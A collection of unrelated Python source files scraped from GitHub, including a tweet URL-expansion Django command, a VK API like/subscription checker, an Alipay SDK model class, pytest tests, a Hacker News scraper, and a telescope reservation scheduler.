from optparse import make_option
import sys
from socket import error as socket_error
import codecs
import unicodedata
import requests
from django.core.management.base import BaseCommand, CommandError
from ui.models import TwitterUser, TwitterUserItem, TwitterUserItemUrl
from ui.utils import make_date_aware
from queryset_iterator import queryset_iterator
class Command(BaseCommand):
help = 'fetch expanded urls for tweets with urls in text'
option_list = BaseCommand.option_list + (
make_option('--start-date', action='store', default=None,
type='string', dest='start_date',
help='earliest date (YYYY-MM-DD) for export'),
make_option('--end-date', action='store', default=None,
type='string', dest='end_date',
help='latest date (YYYY-MM-DD) for export'),
make_option('--twitter-user', action='store', default=None,
type='string', dest='twitter_user',
help='username to export'),
make_option('--limit', action='store', default=0,
type='int', dest='limit',
help='max number of links to check'),
make_option('--refetch', action='store_true', default=False,
help='refetch urls that have been fetched before'),
)
def handle(self, *args, **options):
twitter_user = None
start_dt = None
end_dt = None
if options['twitter_user']:
try:
twitter_user = TwitterUser.objects.get(
name=options['twitter_user'])
except TwitterUser.DoesNotExist:
raise CommandError('TwitterUser %s does not exist' %
options['twitter_user'])
if options['start_date']:
start_dt = make_date_aware(options['start_date'])
if not start_dt:
raise CommandError('dates must be in the format YYYY-MM-DD')
else:
start_dt = None
if options['end_date']:
end_dt = make_date_aware(options['end_date'])
if not end_dt:
raise CommandError('dates must be in the format YYYY-MM-DD')
else:
end_dt = None
if start_dt and end_dt:
if end_dt < start_dt:
raise CommandError('start date must be earlier than end date')
if twitter_user:
qs = twitter_user.items.all()
else:
qs = TwitterUserItem.objects.all()
if not options['refetch']:
qs = qs.filter(urls__isnull=True)
if start_dt:
qs = qs.filter(date_published__gte=start_dt)
if end_dt:
qs = qs.filter(date_published__lte=end_dt)
qs = queryset_iterator(qs)
count = 0
for tui in qs:
urls = []
urls.extend(tui.tweet['entities']['urls'])
if 'media' in tui.tweet['entities'].keys():
urls.extend(tui.tweet['entities']['media'])
if not urls:
# use of entities.urls was spotty at first
for u in tui.links:
if ('...' in unicodedata.normalize('NFKD', u).encode('ascii','ignore')
and tui.tweet['retweet_count'] > 0) :
continue
urls.append({'url': u, 'expanded_url': u})
for url in urls:
try:
r = requests.head(url['expanded_url'],
allow_redirects=True,
timeout=10)
if r.status_code == 405:
r = requests.get(url['expanded_url'],
allow_redirects=True,
stream=True, timeout=10)
r.close()
req_history_headers = []
for req in r.history:
req_headers = self.decode_headers(req.headers, req.encoding)
req_history_headers.append((
req.status_code,
req.url,
req_headers))
final_req_headers = self.decode_headers(r.headers, r.encoding)
tuiu = TwitterUserItemUrl(
item=tui,
start_url=url['url'],
expanded_url=url['expanded_url'],
history=json.dumps(req_history_headers),
final_url=r.url,
final_status=r.status_code,
final_headers=json.dumps(final_req_headers),
duration_seconds=r.elapsed.total_seconds())
tuiu.save()
except (requests.RequestException) as e:
# TODO: consider trapping/recording
# requests.exceptions.ConnectionError,
# requests.exceptions.TooManyRedirects etc.
# and flagging records as having errored out
print("Request Exceptions Error fetching %s: %s" % (url['expanded_url'].encode('utf-8'), e))
except (requests.packages.urllib3.exceptions.HTTPError) as e:
print("HTTPError fetching %s: %s" % (url['expanded_url'].encode('utf-8'), e))
except (socket_error) as e:
print("Socket error fetching %s: %s" % (url['expanded_url'].encode('utf-8'), e))
tuiu = TwitterUserItemUrl(
item=tui,
start_url=url['url'],
expanded_url=url['expanded_url'],
final_url=url['url'],
final_status=410)
tuiu.save()
if urls:
count += 1
if options['limit']:
if count >= options['limit']:
sys.exit()
def decode_headers(self, headers, encoding):
try:
header_codec = codecs.lookup(encoding
or 'utf-8')
except LookupError:
header_codec = codecs.lookup('utf-8')
final_headers = {}
for k, v in headers.items():
final_headers.update({
header_codec.decode(k),
header_codec.decode(v)})
return final_headers
| gwu-libraries/social-feed-manager | sfm/ui/management/commands/fetch_urls.py | fetch_urls.py | py | 6,563 | python | en | code | 87 | github-code | 13 |
72387988177 | import json
from helpers import request_helper
from web import cache
from libs.socnet.socnet_base import SocnetBase
from models.soc_token import SocToken
from models.payment_loyalty_sharing import PaymentLoyaltySharing
class VkApi(SocnetBase):
API_PATH = 'https://api.vk.com/method/'
MAX_LIKES_COUNT = 1000
def subscription_control(self, condition_id):
answer = False
condition = PaymentLoyaltySharing.query.get(condition_id)
if not condition:
return False
api_url = self.API_PATH \
+ 'groups.getById?group_id=' \
+ condition.data \
+ '&fields=members_count'
group = request_helper.make_request(api_url, True)
if 'response' in group and len(group['response']) > 0 \
and 'members_count' in group['response'][0]:
answer = group['response'][0]['members_count']
return answer
def check_subscription(self, url, token_id, sharing_id):
"""подпиcка на группу"""
answer = self.CONDITION_ERROR
condition = PaymentLoyaltySharing.query.get(sharing_id)
if not condition:
return self.CONDITION_ERROR
soc_token = SocToken.query.get(token_id)
if not soc_token:
return self.CONDITION_FAILED
api_url = self.API_PATH \
+ 'users.getSubscriptions?user_id=' \
+ soc_token.soc_id
userSubs = request_helper.make_request(api_url, True)
if not ('response' in userSubs and 'groups' in userSubs['response']):
return self.CONDITION_ERROR
answer = self.CONDITION_FAILED
if not ('items' in userSubs['response']['groups']):
return answer
for item in userSubs['response']['groups']['items']:
if str(item) == str(condition.data):
answer = self.CONDITION_PASSED
return answer
def check_like(self, url, token_id, sharing_id):
"""лайк объекта"""
answer = self.CONDITION_ERROR
condition = PaymentLoyaltySharing.query.get(sharing_id)
if not condition:
return self.CONDITION_FAILED
data = json.loads(condition.data)
if not ('owner_id' in data and 'type' in data and 'item_id' in data):
return self.CONDITION_FAILED
soc_token = SocToken.query.get(token_id)
if not soc_token:
return self.CONDITION_FAILED
key = 'vk_likes_list_%s' % str(condition.id)
if cache.get(key):
likes_list = cache.get(key)
answer = self.CONDITION_FAILED
for user_id in likes_list:
if str(user_id) == str(soc_token.soc_id):
answer = self.CONDITION_PASSED
break
return answer
offset = 0
likes_count = self.MAX_LIKES_COUNT
likes_list = []
while not (offset > likes_count):
api_url = self.API_PATH \
+ 'likes.getList' \
+ '?type=' \
+ str(data['type']) \
+ '&owner_id=' \
+ str(data['owner_id']) \
+ '&item_id=' \
+ str(data['item_id']) \
+ '&count=' \
+ str(self.MAX_LIKES_COUNT) \
+ '&offset=' \
+ str(offset)
likes = request_helper.make_request(api_url, True)
if not('response' in likes and 'count' in likes['response'] and 'users' in likes['response']):
return self.CONDITION_ERROR
if answer == self.CONDITION_ERROR:
answer = self.CONDITION_FAILED
likes_count = int(likes['response']['count'])
for user_id in likes['response']['users']:
likes_list.append(user_id)
if str(user_id) == str(soc_token.soc_id):
answer = self.CONDITION_PASSED
offset += self.MAX_LIKES_COUNT
cache.set(key, likes_list, 50)
return answer
def likes_control_value(self, condition_id):
answer = False
condition = PaymentLoyaltySharing.query.get(condition_id)
if not condition:
return False
data = json.loads(condition.data)
if not ('owner_id' in data and 'type' in data and 'item_id' in data):
return False
api_url = self.API_PATH \
+ 'likes.getList' \
+ '?type=' \
+ str(data['type']) \
+ '&owner_id=' \
+ str(data['owner_id']) \
+ '&item_id=' \
+ str(data['item_id']) \
+ '&count=1'
likes = request_helper.make_request(api_url, True)
if not('response' in likes and 'count' in likes['response'] and 'users' in likes['response']):
return False
answer = int(likes['response']['count'])
return answer
| bigbag/archive_term-flask | libs/socnet/vk.py | vk.py | py | 4,962 | python | en | code | 0 | github-code | 13 |
17053793224 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ItemQueryInfo(object):
def __init__(self):
self._brand = None
self._buy_url = None
self._currency_type = None
self._goods_id = None
self._goods_name = None
self._lanch_time = None
self._monetary_unit = None
self._price = None
self._promo_pic_url_list = None
self._score = None
self._tags = None
@property
def brand(self):
return self._brand
@brand.setter
def brand(self, value):
self._brand = value
@property
def buy_url(self):
return self._buy_url
@buy_url.setter
def buy_url(self, value):
self._buy_url = value
@property
def currency_type(self):
return self._currency_type
@currency_type.setter
def currency_type(self, value):
self._currency_type = value
@property
def goods_id(self):
return self._goods_id
@goods_id.setter
def goods_id(self, value):
self._goods_id = value
@property
def goods_name(self):
return self._goods_name
@goods_name.setter
def goods_name(self, value):
self._goods_name = value
@property
def lanch_time(self):
return self._lanch_time
@lanch_time.setter
def lanch_time(self, value):
self._lanch_time = value
@property
def monetary_unit(self):
return self._monetary_unit
@monetary_unit.setter
def monetary_unit(self, value):
self._monetary_unit = value
@property
def price(self):
return self._price
@price.setter
def price(self, value):
self._price = value
@property
def promo_pic_url_list(self):
return self._promo_pic_url_list
@promo_pic_url_list.setter
def promo_pic_url_list(self, value):
if isinstance(value, list):
self._promo_pic_url_list = list()
for i in value:
self._promo_pic_url_list.append(i)
@property
def score(self):
return self._score
@score.setter
def score(self, value):
self._score = value
@property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags = value
def to_alipay_dict(self):
params = dict()
if self.brand:
if hasattr(self.brand, 'to_alipay_dict'):
params['brand'] = self.brand.to_alipay_dict()
else:
params['brand'] = self.brand
if self.buy_url:
if hasattr(self.buy_url, 'to_alipay_dict'):
params['buy_url'] = self.buy_url.to_alipay_dict()
else:
params['buy_url'] = self.buy_url
if self.currency_type:
if hasattr(self.currency_type, 'to_alipay_dict'):
params['currency_type'] = self.currency_type.to_alipay_dict()
else:
params['currency_type'] = self.currency_type
if self.goods_id:
if hasattr(self.goods_id, 'to_alipay_dict'):
params['goods_id'] = self.goods_id.to_alipay_dict()
else:
params['goods_id'] = self.goods_id
if self.goods_name:
if hasattr(self.goods_name, 'to_alipay_dict'):
params['goods_name'] = self.goods_name.to_alipay_dict()
else:
params['goods_name'] = self.goods_name
if self.lanch_time:
if hasattr(self.lanch_time, 'to_alipay_dict'):
params['lanch_time'] = self.lanch_time.to_alipay_dict()
else:
params['lanch_time'] = self.lanch_time
if self.monetary_unit:
if hasattr(self.monetary_unit, 'to_alipay_dict'):
params['monetary_unit'] = self.monetary_unit.to_alipay_dict()
else:
params['monetary_unit'] = self.monetary_unit
if self.price:
if hasattr(self.price, 'to_alipay_dict'):
params['price'] = self.price.to_alipay_dict()
else:
params['price'] = self.price
if self.promo_pic_url_list:
if isinstance(self.promo_pic_url_list, list):
for i in range(0, len(self.promo_pic_url_list)):
element = self.promo_pic_url_list[i]
if hasattr(element, 'to_alipay_dict'):
self.promo_pic_url_list[i] = element.to_alipay_dict()
if hasattr(self.promo_pic_url_list, 'to_alipay_dict'):
params['promo_pic_url_list'] = self.promo_pic_url_list.to_alipay_dict()
else:
params['promo_pic_url_list'] = self.promo_pic_url_list
if self.score:
if hasattr(self.score, 'to_alipay_dict'):
params['score'] = self.score.to_alipay_dict()
else:
params['score'] = self.score
if self.tags:
if hasattr(self.tags, 'to_alipay_dict'):
params['tags'] = self.tags.to_alipay_dict()
else:
params['tags'] = self.tags
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ItemQueryInfo()
if 'brand' in d:
o.brand = d['brand']
if 'buy_url' in d:
o.buy_url = d['buy_url']
if 'currency_type' in d:
o.currency_type = d['currency_type']
if 'goods_id' in d:
o.goods_id = d['goods_id']
if 'goods_name' in d:
o.goods_name = d['goods_name']
if 'lanch_time' in d:
o.lanch_time = d['lanch_time']
if 'monetary_unit' in d:
o.monetary_unit = d['monetary_unit']
if 'price' in d:
o.price = d['price']
if 'promo_pic_url_list' in d:
o.promo_pic_url_list = d['promo_pic_url_list']
if 'score' in d:
o.score = d['score']
if 'tags' in d:
o.tags = d['tags']
return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/ItemQueryInfo.py | ItemQueryInfo.py | py | 6,130 | python | en | code | 241 | github-code | 13 |
74901464016 | import pytest
from utilities import *
from polynomial_interpolation_tools import *
from numpy import random
import numpy as np
@pytest.mark.parametrize('m, n', [(10,11), (7,11), (5,10)])
def test_coefficients_solve(m, n):
"""
Test to see if obtained coefficients match that of a true polynomial these points came from.
:param m: An integer corresponding to degree of polynomial
:param n: An integer corresponding to number of points taken from that polynomial
:return bool: Pass or fail
"""
# Finding n points f on a known polynomial of degree m, assuming n >= m
x_test = np.random.rand(n)
f_test = 0.0*x_test
a_test = np.random.rand(m)
for i in range(n):
for n in range(m):
f_test[i] = f_test[i] + a_test[n]*x_test[i]**n
# Reverse engineering for coefficients from these points
a = coefficients_solve(x_test, f_test, n)
# Checking coefficients are the same
assert(np.linalg.norm(a-a_test) < 1.0e-6)
@pytest.mark.parametrize('n', [1,2,3,4,5])
def test_alternate_perturbations(n):
"""
Test to see if all up/down combinations of perturbations achieved.
:param n: An integer for size of array to find combinations of
:return bool: Pass or fail
"""
# Creating random array of values and finding all possible alternations
epsilons = np.random.rand(n)
perturbations = alternate_perturbations(epsilons)
# Checking found all possible combinations
assert(len(perturbations) == 2**n)
@pytest.mark.parametrize('n', [2, 3, 11])
def test_perturb_points(n):
"""
Test to see if points f are perturbed correctly.
:param n: An integer to define number of points being perturbed
:return bool: Pass or fail
"""
# Creating random array of points and perturbations
f = np.random.rand(n)
epsilons = np.random.rand(n)
f_perturbed = perturb_points(f, epsilons)
# Checking to see if points in punctured ball of perturbations
assert(((f-f_perturbed) != np.zeros(n)).all())
assert((f-f_perturbed <= epsilons).all())
if __name__ == '__main__':
import sys
pytest.main(sys.argv)
| jameswawright/NLA | scripts/test_polynomial_interpolation.py | test_polynomial_interpolation.py | py | 2,172 | python | en | code | 1 | github-code | 13 |
3848523959 | import requests
from bs4 import BeautifulSoup
#
response = requests.get("https://news.ycombinator.com/news")
response.raise_for_status()
web_page = response.text
soup = BeautifulSoup(web_page, "html.parser")
titles = soup.find_all(name="a", class_="titlelink")
article_links = []
article_titles = []
for title in titles:
text = title.getText()
article_titles.append(text)
link = title.get("href")
article_links.append(link)
article_upvotes = [score.getText() for score in soup.find_all(name="span", class_="score")]
# print(article_titles)
# print(article_links)
# print(article_upvotes)
scores = [score.split()[0] for score in article_upvotes]
highest_score = scores[0]
index = 0
score_index = 0
for score in scores:
if int(score) > int(highest_score):
highest_score = score
score_index = index
index += 1
print(f"{highest_score} Index: {score_index}")
print(f"Title: {article_titles[score_index]}\nLink: {article_links[score_index]}")
# with open("website.html", encoding="utf8") as file:
# contents = file.read()
#
# #print(contents)
# soup = BeautifulSoup(contents, 'html.parser')
# #print(soup.title)
# #print(soup.title.name)
# #print(soup.prettify())
#
# #print(soup.p)
#
# all_anchor_tags = soup.findAll(name="a")
# #print(all_anchor_tags)
#
# # for tag in all_anchor_tags:
# #print(tag.getText())
# #print(tag.get("href"))
#
# # heading = soup.find("h1", id="name")
# # print(heading)
# #
#
#
# # class_is_heading = soup.find_all(class_="heading")
# # print(class_is_heading)
# #
# # h3_heading = soup.find_all("h3", class_="heading")
# # print(h3_heading)
#
# # company_url = soup.select_one(selector="p a")
# # print(company_url)
#
# # company_url = soup.select_one(selector="#name") # Select by ID
# # print(company_url)
#
# heading = soup.select(selector=".heading") # Select by Class
# print(heading)
| gteachey/100daysofcode_python | day045/bs4-start/main.py | main.py | py | 1,876 | python | en | code | 0 | github-code | 13 |
21681639441 | import typer
import pytest
import uvicorn
import subprocess
app = typer.Typer(
help="cli tool stuff thing",
context_settings={"help_option_names": ["-h", "--help"]},
no_args_is_help=True,
)
@app.command(help="Serve the main uvicorn application")
def runserver(prod: bool = typer.Option(
False, help="Use production server with workers")):
uvicorn.run("app.main:app", host='127.0.0.1', port=8000, reload=not prod)
@app.command()
def makemigrations(name: str):
print('Hello', name)
@app.command(help="Run unit tests on all models")
def test():
subprocess.call(['pytest', '--no-header', '--verbose'])
if __name__ == '__main__':
app()
| Braden-Preston/fastapi-htmx | manage.py | manage.py | py | 672 | python | en | code | 0 | github-code | 13 |
17042061944 | a = int(input("Введите результат спортсмена в первый день: "))
b = int(input("Введите предпочтительный результат спортсмена: "))
k = 1
print(f"{k}-й день: {a}")
while a <= b:
a = a + (a / 100 * 10)
k = k + 1
print(f"{k}-й день: {a:.2f}")
print(f"На {k}-й день спортсмен достиг результата - не менее {b} км")
| TerryNight/HomeworkPython | Homework6.py | Homework6.py | py | 451 | python | ru | code | 0 | github-code | 13 |
73252757779 | def cipher(text, shift, encrypt=True):
"""
This function will encrypt or decrypt text using caesar cipher method.
Parameters
----------
text : str
A string to encrypt or decrypt.
shift : int
An integer for how many digits to shift down the alphabet.
encrypt : bool, optional
A boolean to indicate if you want to encrypt/decrypt the text using this function.
Returns
-------
new_text
The encrypted or decrypted text.
Examples
--------
>>> from cipher_shh2145_2 import cipher
>>> cipher('shauna', 1, encrypt = True)
'Tibvob'
>>> cipher('Tibvob', 1, encrypt = False)
'Shauna'
"""
alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
new_text = ''
for c in text:
index = alphabet.find(c)
if index == -1:
new_text += c
else:
new_index = index + shift if encrypt == True else index - shift
new_index %= len(alphabet)
new_text += alphabet[new_index:new_index+1]
return new_text
| QMSS-G5072-2022/Cipher_Han_Shauna | src/cipher_shh2145_2/cipher_shh2145_2.py | cipher_shh2145_2.py | py | 1,071 | python | en | code | 0 | github-code | 13 |
27749964817 | # -*- coding: utf-8 -*-
# @Time : 2021/5/15 9:49
# @Author : WANGWEILI
# @FileName: 3.py
# @Software: PyCharm
"""
输入一个字符串s,只能包括英文括号( 和 ),且左右括号匹配。回车符结束输入。
字符串s长度:2<=s.length()<=50
"""
SYMBOLS = {'}': '{', ']': '[', ')': '(', '>': '<'}
SYMBOLS_L, SYMBOLS_R = SYMBOLS.values(), SYMBOLS.keys()
def check(s):
count = 0
arr = []
for c in s:
if c in SYMBOLS_L:
# 左符号入栈
arr.append(c)
elif c in SYMBOLS_R:
# 右符号要么出栈,要么匹配失败
if arr and arr[-1] == SYMBOLS[c]:
arr.pop()
count += 1
else:
return False
return count
stopword = ''
str = ''
for line in iter(input, stopword):
str += line
print(check(str))
| Echowwlwz123/learn7 | 浦发机试题/3.py | 3.py | py | 861 | python | en | code | 0 | github-code | 13 |
26412155082 | '''
0123456789
0 2199943210
1 3987894921
2 9856789892
3 8767896789
4 9899965678
'''
import Inputs
# ADYACENT POSITIONS AS VALUES
def val_up(val_map, row, col): # check up
if row != 0:
val_up = int(val_map[row-1][col])
else:
val_up = 10 # If it's a corner/boundary situation, it's compared
# to 10 so that check will pass
return val_up
def val_right(val_map, row, col): # check right
if len(val_map[row]) != col+1:
val_right = int(val_map[row][col+1])
else:
val_right = 10
return val_right
def val_down(val_map, row, col): # check down
if len(val_map) != row + 1:
val_down = int(val_map[row+1][col])
else:
val_down = 10
return val_down
def val_left(val_map, row, col): # check left
if col != 0:
val_left = int(val_map[row][col-1])
else:
val_left = 10
return val_left
# ADYACENT POSITIONS AS OBJECTS
def pos_up(val_map, row, col): # check up
if row != 0:
return Position(row-1, col, val_map)
else:
return None # If it's a corner/boundary situation, return None
def pos_right(val_map, row, col): # check right
if len(val_map[row]) != col+1:
return Position(row, col+1, val_map)
else:
return None
def pos_down(val_map, row, col): # check down
if len(val_map) != row + 1:
val_down = Position(row+1, col, val_map)
else:
val_down = None
return val_down
def pos_left(val_map, row, col): # check left
if col != 0:
val_left = Position(row, col-1, val_map)
else:
val_left = None
return val_left
class Position:
def __init__(self, row, col, vals_map):
self.row = row
self.col = col
self.value = int(vals_map[row][col])
self.id = (row, col)
self.up_val = val_up(vals_map, row, col)
self.right_val = val_right(vals_map, row, col)
self.down_val = val_down(vals_map, row, col)
self.left_val = val_left(vals_map, row, col)
self.ady_values = [self.up_val, self.right_val, self.down_val, self.left_val]
def ady_positions(self, vals_map):
return [pos_up(vals_map, self.row, self.col),
pos_right(vals_map, self.row, self.col),
pos_down(vals_map, self.row, self.col),
pos_left(vals_map, self.row, self.col)]
def is_low_point(self):
'''Returns true if it's adyacent values are higher
than the checked value.'''
if all([ady > int(self.value) for ady in self.ady_values]):
return True
else:
return False
def is_basin_limit(self):
'''Returns true if it's value is equal to 9'''
if self.value == 9:
return True
else:
return False
sample = [
"2199943210",
"3987894921",
"9856789892",
"8767896789",
"9899965678",
]
puz_input = Inputs.Day09()
# puz_input = sample
low_points = []
basin_lst = []
# Convert list of strings to list of list of chars
for row_idx, row in enumerate(puz_input):
lst = []
word = puz_input[row_idx]
lst.extend(puz_input[row_idx])
puz_input[row_idx] = lst
# Make a list with the low points in the map
for row_idx, row in enumerate(puz_input):
for col_idx, col in enumerate(row):
pos = Position(row_idx, col_idx, puz_input)
if pos.is_low_point():
low_points.append(pos)
# Start crawling from the low points in the map
for low_pt in low_points:
basin = [low_pt.id]
old_basin_count = 0
n=0
# clean list
while len(basin) != old_basin_count:
n += 1
old_basin_count = len(basin)
for pt_id in basin.copy():
pt = Position(pt_id[0], pt_id[1], puz_input)
ady_vals = pt.ady_positions(puz_input)
for ady_val in ady_vals:
if ady_val is not None:
if ady_val.value != 9 and ady_val.id not in basin:
basin.append(ady_val.id)
basin_lst.append(basin)
sorted_lst = sorted(basin_lst, key = len)
answer = len(sorted_lst[-1])*len(sorted_lst[-2])*len(sorted_lst[-3])
print(len(sorted_lst[-1]), len(sorted_lst[-2]), len(sorted_lst[-3]))
print(f"Answer is {answer}")
'''
119 99 97
1142757
''' | GastonBC/AdventOfCode | 2021/python/Day09_2.py | Day09_2.py | py | 4,426 | python | en | code | 0 | github-code | 13 |
24621126374 | #!/usr/bin/env python
''' Reservation and CompoundReservation classes for scheduling.
Author: Sotiria Lampoudi (slampoud@gmail.com)
December 2012
Reservation does not associate a single resource with each reservation.
Instead, the possible_windows field has become possible_windows_dict, a
dictionary mapping :
resource -> possible windows on that resource
Additionally, it is allowed to explicitly specify the resID, so as to
keep a uniform ID space between this and other parts of the scheduler.
'''
import copy
class Reservation(object):
resID = 0
def __init__(self, priority, duration, possible_windows_dict, previous_solution_reservation=None, request=None, request_group_id=None):
self.priority = priority
self.duration = int(duration)
self.previous_solution_reservation = previous_solution_reservation
self.request = request
self.request_group_id = request_group_id
self.possible_windows_dict = possible_windows_dict
# free_windows keeps track of which of the possible_windows
# are free.
self.free_windows_dict = copy.deepcopy(self.possible_windows_dict)
# clean up free windows by removing ones that are too small:
for resource in self.free_windows_dict.keys():
self.clean_up_free_windows(resource)
# set a unique resID.
Reservation.resID += 1
self.resID = Reservation.resID
# these fields are defined when the reservation is ultimately scheduled
self.scheduled_start = None
self.scheduled_quantum = None
self.scheduled_resource = None
self.scheduled = False
self.scheduled_timepoints = None
self.scheduled_by = None
# order is the parameter used for grouping & ordering in scheduling
self.order = 1
self.compound_reservation_parent = None
def schedule_anywhere(self):
# find the first available spot & stick it there
for resource in self.free_windows_dict.keys():
start = self.free_windows_dict[resource].find_interval_of_length(self.duration)
if start >= 0:
self.schedule(start, self.duration, resource,
'reservation_v3.schedule_anywhere()')
return True
return False
def schedule(self, start, quantum, resource, scheduler_description=None):
self.scheduled = True
self.scheduled_start = start
self.scheduled_quantum = quantum
self.scheduled_resource = resource
self.scheduled_timepoints = [{'time': start, 'type': 'start'}, {'time': start + self.duration, 'type': 'end'}]
self.scheduled_by = scheduler_description
if self.compound_reservation_parent:
self.compound_reservation_parent.schedule()
def unschedule(self):
self.scheduled_start = None
self.scheduled_quantum = None
self.scheduled_resource = None
self.scheduled = False
self.scheduled_timepoints = None
self.scheduled_by = None
if self.compound_reservation_parent:
self.compound_reservation_parent.unschedule()
def __str__(self):
msg = "Reservation ID: {0} \
\n\tpriority: {1} \
\n\tduration: {2} \
\n\tpossible windows dict: {3}\
\n\tis scheduled: {4}\n".format(self.resID, self.priority,
self.duration,
self.possible_windows_dict,
self.scheduled)
if self.scheduled:
msg += "\t\tscheduled start: {0}\n\t\tscheduled quantum: {1}\n\t\tscheduled resource: {2}\n\t\tscheduled by: {3}\n".format(
self.scheduled_start, self.scheduled_quantum, self.scheduled_resource, self.scheduled_by)
return msg
def __repr__(self):
return str(self.serialise())
def serialise(self):
serialised_windows = dict([(k, v.serialise()) for k, v in self.possible_windows_dict.items()])
return dict(
# resID = self.resID,
priority=self.priority,
duration=self.duration,
possible_windows_dict=serialised_windows,
scheduled=self.scheduled
)
def __lt__(self, other):
''' Higher priority number is higher priority.
If priority numbers are equal, then reservation belonging to
c.r.s are ranked as and < single < oneof '''
if self.priority == other.priority:
if (self.compound_reservation_parent) and (other.compound_reservation_parent):
selftype = self.compound_reservation_parent.type
othertype = other.compound_reservation_parent.type
if selftype == othertype:
return self.priority > other.priority
elif selftype == 'and':
return True
elif othertype == 'and':
return False
elif selftype == 'oneof':
return False
elif othertype == 'oneof':
return True
else:
return self.priority > other.priority
else:
return self.priority > other.priority
def get_ID(self):
return self.resID
def remove_from_free_windows(self, interval, resource):
self.free_windows_dict[resource] = self.free_windows_dict[resource].subtract(interval)
self.clean_up_free_windows(resource)
def clean_up_free_windows(self, resource):
self.free_windows_dict[resource].remove_intervals_smaller_than(self.duration)
class CompoundReservation(object):
valid_types = {
'single': 'A single one of the provided blocks is to be scheduled',
'oneof': 'One of the provided blocks are to be scheduled',
'and': 'All of the provided blocks are to be scheduled',
'many': 'Any of the provided blocks are to be scheduled individually'
}
def __init__(self, reservation_list, cr_type='single'):
self.reservation_list = reservation_list
for r in self.reservation_list:
r.compound_reservation_parent = self
self.type = cr_type
# allowed types are:
# single
# oneof
# and
self.size = len(reservation_list)
if cr_type == 'single' and self.size > 1:
msg = ("Initializing a CompoundReservation as 'single' but with %d "
"individual reservations. Ignoring all but the first."
% self.size)
print(msg)
self.size = 1
self.reservation_list = [reservation_list.pop(0)]
if (cr_type == 'and') and (self.size == 1):
msg = ("Initializing a CompoundReservation as 'and' but with %d "
"individual reservation."
% self.size)
print(msg)
if cr_type == 'oneof' and self.size == 1:
msg = ("Initializing a CompoundReservation as 'oneof' but with %d "
"individual reservation."
% self.size)
print(msg)
self.scheduled = False
def schedule(self):
if self.type == 'single':
self.scheduled = True
elif self.type == 'oneof':
self.scheduled = True
elif self.type == 'and':
count = 0
for r in self.reservation_list:
if r.scheduled:
count += 1
if count == self.size:
self.scheduled = True
def unschedule(self):
if self.type == 'single':
self.scheduled = False
elif self.type == 'oneof':
self.scheduled = False
for r in self.reservation_list:
if r.scheduled:
self.scheduled = True
elif self.type == 'and':
self.scheduled = False
def issingle(self):
if self.type == "single":
return True
else:
return False
def isoneof(self):
if self.type == "oneof":
return True
else:
return False
def isand(self):
if self.type == "and":
return True
else:
return False
def __repr__(self):
return str(self.serialise())
def serialise(self):
reservation_list_repr = [r.serialise() for r in self.reservation_list]
return dict(
type=str(self.type),
size=int(self.size),
scheduled=bool(self.scheduled),
reservation_list=reservation_list_repr
)
| observatorycontrolsystem/adaptive_scheduler | adaptive_scheduler/kernel/reservation.py | reservation.py | py | 8,702 | python | en | code | 4 | github-code | 13 |
34785899118 | from rct229.utils.assertions import assert_, getattr_
from rct229.utils.jsonpath_utils import find_all, find_exactly_one_with_field_value
LEAP_YEAR_HRS = 8784
NON_LEAP_YEAR_HRS = 8760
def get_min_oa_cfm_sch_zone(rmi, zone_id, is_leap_year: bool = False):
"""Each zone can have multiple terminal units sering it in the proposed RMR and each of these units could supply OA CFM. In order to obtain a zone level OA CFM schedule the OA CFM provided by each terminal unit needs to be aggregated for each hour of the year. This function receives an RMR (B, U, or P) and a zone ID and loops through each terminal unit associated with the zone to create an aggregated 8760 for OA CFM for the zone.
Parameters
----------
rmi: json
The RMR in which the OA CFM schedule will be determined for the specific Zone ID.
zone_id:
The Zone ID in which the aggregated (across the terminal units serving the zone) hourly OA CFM schedule will be determined.
is_leap_year: bool, default: False
Whether the year is a leap year or not.
Returns
-------
list: An aggregated OA CFM hourly schedule for the zone (for each hour of the year, for each terminal unit, Terminal.minimum_outdoor_airflow is multiplied by Terminal.minimum_outdoor_airflow_multiplier_schedule, this product is summed across the terminal units for each hour of the year).
None if the zone has no terminal or every terminal in the zone do not use minimum_outdoor_airflow_multiplier_schedule.
"""
LEAP_YEAR_HRS = 8784
NON_LEAP_YEAR_HRS = 8760
year_hrs = LEAP_YEAR_HRS if is_leap_year else NON_LEAP_YEAR_HRS
min_OA_CFM_schedule_for_zone = [0] * year_hrs
for terminal in find_all(
f'$.buildings[*].building_segments[*].zones[*][?(@.id = "{zone_id}")].terminals[*]',
rmi,
):
minimum_outdoor_airflow = getattr_(
terminal, "terminal", "minimum_outdoor_airflow"
)
minimum_outdoor_airflow_multiplier_schedule_id = terminal.get(
"minimum_outdoor_airflow_multiplier_schedule"
)
if minimum_outdoor_airflow_multiplier_schedule_id:
minimum_outdoor_airflow_multiplier_schedule = getattr_(
find_exactly_one_with_field_value(
"$.schedules[*]",
"id",
minimum_outdoor_airflow_multiplier_schedule_id,
rmi,
),
"Schedule",
"hourly_values",
)
assert_(
len(min_OA_CFM_schedule_for_zone)
== len(minimum_outdoor_airflow_multiplier_schedule),
f"The length of schedule has to be either 8760 or 8784, but is {len(minimum_outdoor_airflow_multiplier_schedule)}.",
)
min_OA_CFM_schedule_for_zone = list(
map(
lambda x, y: x + y * minimum_outdoor_airflow,
min_OA_CFM_schedule_for_zone,
minimum_outdoor_airflow_multiplier_schedule,
)
)
return min_OA_CFM_schedule_for_zone
| pnnl/ruleset-checking-tool | rct229/rulesets/ashrae9012019/ruleset_functions/get_min_oa_cfm_sch_zone.py | get_min_oa_cfm_sch_zone.py | py | 3,133 | python | en | code | 6 | github-code | 13 |
15418291967 |
def yn_checker(question):
error = "Please choose yes or no (y / n) "
valid = False
while not valid:
response = input(question).lower()
print()
if response == "yes" or response == "y":
return "Yes"
elif response == "no" or response == "n":
return "No"
else:
print(error)
print()
losses = 10
wins = 10
print(losses)
print(wins)
quizzes_played = 2
quizzes_played += 1
if quizzes_played > 1:
print("")
yes_no = yn_checker("Would you like to re-start your score board? ")
if yes_no == "Yes":
losses = 0
wins = 0
print(losses)
print(wins) | williamsj71169/ZZ_Assessment | Re_start_board_evidence.py | Re_start_board_evidence.py | py | 667 | python | en | code | 0 | github-code | 13 |
